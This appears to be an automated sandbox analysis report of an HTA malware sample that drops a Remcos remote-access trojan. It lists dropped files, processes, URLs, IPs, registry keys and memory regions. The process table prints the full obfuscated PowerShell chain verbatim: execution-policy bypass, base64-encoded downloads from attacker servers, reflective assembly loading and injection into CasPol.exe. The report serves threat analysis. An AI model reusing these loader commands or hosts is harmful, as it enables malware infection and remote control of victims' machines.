Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
seethebestthignswhichgivingbestopportunities.hta
|
HTML document, ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS
|
Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\seehavingfacingbestthignstogetmebackwithentiretimegreat[1].tiff
|
Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (373)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (458), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES883E.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Nov 20 17:52:41 2024,
1st section name ".debug$S"
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23tktpul.af1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jwfpjpe.haj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ag1mfjzx.xjf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw5s3ehw.lvg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmdh42oq.w3x.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eytv0bik.whx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkfm2a1g.arv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1iyyruq.wpo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5mqnq00.5d5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgwk5qel.12s.ps1
|
ASCII text, with no line terminators
|
dropped
|
There are 13 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\seethebestthignswhichgivingbestopportunities.hta"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex
bYPAsS -NOp -W 1
-C dEvICeCredEntIaldepLoYmENT ;
INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f
ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag
= ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex
= opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length
= opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed
= -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes
= [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod
= [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd,
ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp"
"c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF
|
192.3.220.29
|
||
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4
|
unknown
|
||
banaya.duckdns.org
|
|||
http://192.3.220.29/45/HDRDDG.txt
|
192.3.220.29
|
||
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
https://www.html-code-generator.com
|
unknown
|
||
http://192.3.220.29/45/seehaving
|
unknown
|
||
http://crl.microsoftG
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://geoplugin.net/json.gpl
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
|
142.215.209.78
|
||
https://1017.filemail.com
|
unknown
|
||
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF9LMEM
|
unknown
|
||
https://aka.ms/pscore6LR
|
unknown
|
||
http://go.micros
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://geoplugin.net/json.gpSystem32
|
unknown
|
||
http://192.3.220.29/
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
http://geoplugin.net/json.gp/C
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFn
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC:
|
unknown
|
||
http://www.microsoft.W?7
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF0J/
|
unknown
|
There are 26 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
banaya.duckdns.org
|
192.3.101.149
|
||
geoplugin.net
|
178.237.33.50
|
||
ip.1017.filemail.com
|
142.215.209.78
|
||
1017.filemail.com
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.3.220.29
|
unknown
|
United States
|
||
192.3.101.149
|
banaya.duckdns.org
|
United States
|
||
142.215.209.78
|
ip.1017.filemail.com
|
Canada
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-VCYBO3
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-VCYBO3
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-VCYBO3
|
time
|
There are 8 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
400000
|
remote allocation
|
page execute and read and write
|
||
C14000
|
heap
|
page read and write
|
||
27BE000
|
stack
|
page read and write
|
||
BF8000
|
heap
|
page read and write
|
||
C39000
|
heap
|
page read and write
|
||
5CC9000
|
trusted library allocation
|
page read and write
|
||
9356000
|
trusted library allocation
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
4DA0000
|
trusted library allocation
|
page read and write
|
||
55C8000
|
heap
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
3030000
|
heap
|
page read and write
|
||
2C5F000
|
heap
|
page read and write
|
||
6F1B000
|
heap
|
page read and write
|
||
11CE000
|
stack
|
page read and write
|
||
70AD000
|
stack
|
page read and write
|
||
7800000
|
heap
|
page execute and read and write
|
||
4670000
|
heap
|
page read and write
|
||
7AF0000
|
trusted library allocation
|
page read and write
|
||
2DEE000
|
stack
|
page read and write
|
||
6DB0000
|
trusted library allocation
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
6B1F000
|
heap
|
page read and write
|
||
7AA0000
|
trusted library allocation
|
page read and write
|
||
2C5E000
|
heap
|
page read and write
|
||
2DAE000
|
stack
|
page read and write
|
||
7B8C000
|
heap
|
page read and write
|
||
4F0F000
|
stack
|
page read and write
|
||
75F0000
|
trusted library allocation
|
page execute and read and write
|
||
74A5000
|
heap
|
page execute and read and write
|
||
306B000
|
heap
|
page read and write
|
||
7650000
|
trusted library allocation
|
page read and write
|
||
567E000
|
stack
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
2B79000
|
heap
|
page read and write
|
||
6827000
|
heap
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
6C1F000
|
trusted library allocation
|
page read and write
|
||
AF0000
|
heap
|
page read and write
|
||
4F49000
|
heap
|
page read and write
|
||
5C61000
|
trusted library allocation
|
page read and write
|
||
35B6000
|
heap
|
page read and write
|
||
2DAE000
|
stack
|
page read and write
|
||
6B1F000
|
heap
|
page read and write
|
||
2C7C000
|
heap
|
page read and write
|
||
4FAF000
|
heap
|
page read and write
|
||
53DE000
|
stack
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
7022F000
|
unkown
|
page readonly
|
||
8070000
|
trusted library allocation
|
page read and write
|
||
73ED000
|
heap
|
page read and write
|
||
3649000
|
trusted library allocation
|
page read and write
|
||
2C5F000
|
heap
|
page read and write
|
||
3137000
|
heap
|
page read and write
|
||
7189000
|
heap
|
page read and write
|
||
55BA000
|
heap
|
page read and write
|
||
7415000
|
heap
|
page execute and read and write
|
||
5709000
|
heap
|
page read and write
|
||
3229000
|
heap
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
50AF000
|
heap
|
page read and write
|
||
7E10000
|
trusted library allocation
|
page read and write
|
||
6C1B000
|
trusted library allocation
|
page read and write
|
||
7189000
|
heap
|
page read and write
|
||
3624000
|
trusted library allocation
|
page read and write
|
||
6825000
|
heap
|
page read and write
|
||
502F000
|
heap
|
page read and write
|
||
31BE000
|
stack
|
page read and write
|
||
4E0E000
|
stack
|
page read and write
|
||
7C28000
|
heap
|
page read and write
|
||
5210000
|
heap
|
page readonly
|
||
718F000
|
heap
|
page read and write
|
||
3399000
|
heap
|
page read and write
|
||
7175000
|
heap
|
page read and write
|
||
7530000
|
trusted library allocation
|
page read and write
|
||
4EE5000
|
trusted library allocation
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
7DE0000
|
trusted library allocation
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
7580000
|
trusted library allocation
|
page read and write
|
||
7C15000
|
heap
|
page read and write
|
||
51D7000
|
trusted library allocation
|
page read and write
|
||
310B000
|
heap
|
page read and write
|
||
7184000
|
heap
|
page read and write
|
||
777A000
|
heap
|
page read and write
|
||
719F000
|
heap
|
page read and write
|
||
56FA000
|
heap
|
page read and write
|
||
687C000
|
trusted library allocation
|
page read and write
|
||
6881000
|
trusted library allocation
|
page read and write
|
||
6B38000
|
heap
|
page read and write
|
||
8040000
|
trusted library allocation
|
page execute and read and write
|
||
7CAE000
|
stack
|
page read and write
|
||
7182000
|
heap
|
page read and write
|
||
6D6D000
|
stack
|
page read and write
|
||
796D000
|
stack
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
3430000
|
heap
|
page read and write
|
||
7D0E000
|
stack
|
page read and write
|
||
6B27000
|
heap
|
page read and write
|
||
529E000
|
stack
|
page read and write
|
||
687E000
|
trusted library allocation
|
page read and write
|
||
5706000
|
heap
|
page read and write
|
||
558F000
|
heap
|
page read and write
|
||
4FBE000
|
stack
|
page read and write
|
||
7E90000
|
trusted library allocation
|
page read and write
|
||
3237000
|
heap
|
page read and write
|
||
3249000
|
heap
|
page read and write
|
||
5270000
|
trusted library allocation
|
page read and write
|
||
5030000
|
heap
|
page execute and read and write
|
||
7BA5000
|
heap
|
page read and write
|
||
88B0000
|
trusted library allocation
|
page execute and read and write
|
||
574E000
|
stack
|
page read and write
|
||
7E80000
|
trusted library allocation
|
page read and write
|
||
7189000
|
heap
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
4F3C000
|
stack
|
page read and write
|
||
6399000
|
trusted library allocation
|
page read and write
|
||
2C08000
|
heap
|
page read and write
|
||
5560000
|
heap
|
page read and write
|
||
2D60000
|
heap
|
page read and write
|
||
2C81000
|
heap
|
page read and write
|
||
6C1B000
|
trusted library allocation
|
page read and write
|
||
7777000
|
heap
|
page read and write
|
||
71D3000
|
heap
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
6860000
|
heap
|
page read and write
|
||
6863000
|
heap
|
page read and write
|
||
772B000
|
stack
|
page read and write
|
||
4F50000
|
heap
|
page read and write
|
||
50D5000
|
heap
|
page execute and read and write
|
||
4F13000
|
heap
|
page read and write
|
||
7149000
|
heap
|
page read and write
|
||
358E000
|
stack
|
page read and write
|
||
5281000
|
trusted library allocation
|
page read and write
|
||
6B26000
|
heap
|
page read and write
|
||
681B000
|
heap
|
page read and write
|
||
556E000
|
heap
|
page read and write
|
||
4AB0000
|
trusted library allocation
|
page read and write
|
||
5700000
|
heap
|
page read and write
|
||
687E000
|
trusted library allocation
|
page read and write
|
||
6670000
|
heap
|
page read and write
|
||
70211000
|
unkown
|
page execute read
|
||
687C000
|
trusted library allocation
|
page read and write
|
||
570E000
|
heap
|
page read and write
|
||
CE61000
|
trusted library allocation
|
page read and write
|
||
75F3000
|
trusted library allocation
|
page read and write
|
||
598E000
|
stack
|
page read and write
|
||
6B59000
|
heap
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
67EC000
|
heap
|
page read and write
|
||
5448000
|
trusted library allocation
|
page read and write
|
||
5563000
|
heap
|
page read and write
|
||
55C8000
|
heap
|
page read and write
|
||
50A0000
|
heap
|
page read and write
|
||
897E000
|
stack
|
page read and write
|
||
4830000
|
heap
|
page read and write
|
||
7A90000
|
trusted library allocation
|
page read and write
|
||
328E000
|
stack
|
page read and write
|
||
4625000
|
trusted library allocation
|
page execute and read and write
|
||
4BC5000
|
heap
|
page execute and read and write
|
||
53B0000
|
heap
|
page read and write
|
||
2C90000
|
heap
|
page read and write
|
||
7092000
|
direct allocation
|
page read and write
|
||
7184000
|
heap
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
5462000
|
trusted library allocation
|
page read and write
|
||
6B59000
|
heap
|
page read and write
|
||
4F67000
|
heap
|
page read and write
|
||
75D3000
|
trusted library allocation
|
page read and write
|
||
165E000
|
stack
|
page read and write
|
||
71D3000
|
heap
|
page read and write
|
||
504D000
|
heap
|
page read and write
|
||
6B59000
|
heap
|
page read and write
|
||
341E000
|
stack
|
page read and write
|
||
718D000
|
heap
|
page read and write
|
||
8ABD000
|
heap
|
page read and write
|
||
53CF000
|
trusted library allocation
|
page read and write
|
||
75B0000
|
trusted library allocation
|
page read and write
|
||
75F0000
|
trusted library allocation
|
page read and write
|
||
7194000
|
heap
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
346D000
|
trusted library allocation
|
page execute and read and write
|
||
687A000
|
trusted library allocation
|
page read and write
|
||
4DF0000
|
trusted library allocation
|
page read and write
|
||
470C000
|
trusted library allocation
|
page read and write
|
||
6B22000
|
heap
|
page read and write
|
||
8A00000
|
trusted library allocation
|
page read and write
|
||
7590000
|
trusted library allocation
|
page execute and read and write
|
||
4EE1000
|
trusted library allocation
|
page read and write
|
||
71D3000
|
heap
|
page read and write
|
||
7171000
|
heap
|
page read and write
|
||
B1C000
|
stack
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
70C0000
|
heap
|
page read and write
|
||
3255000
|
heap
|
page read and write
|
||
3241000
|
heap
|
page read and write
|
||
79AB000
|
stack
|
page read and write
|
||
7145000
|
heap
|
page read and write
|
||
530E000
|
stack
|
page read and write
|
||
4F39000
|
heap
|
page read and write
|
||
73AE000
|
stack
|
page read and write
|
||
719C000
|
heap
|
page read and write
|
||
75D9000
|
trusted library allocation
|
page read and write
|
||
687C000
|
trusted library allocation
|
page read and write
|
||
6875000
|
trusted library allocation
|
page read and write
|
||
66DC000
|
heap
|
page read and write
|
||
582E000
